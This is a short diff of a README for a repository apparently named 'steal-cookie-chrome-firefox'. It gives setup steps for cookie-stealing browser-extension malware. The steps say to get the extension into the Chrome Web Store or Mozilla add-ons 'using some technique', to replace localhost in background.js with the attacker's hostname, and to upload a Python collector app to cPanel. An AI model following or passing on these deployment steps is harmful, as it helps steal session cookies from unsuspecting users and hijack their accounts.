hakanonymos/steal-cookie-chrome-firefox/README.md

 use some technique to upload extension in chrome web store or addon mozilla

-now you need to change  : localhost by your hostname
+now you need to change  : localhost by your hostname in the file background.js

-upload the application python in cpanel
+upload the application python in your Cpanel

 ## contact :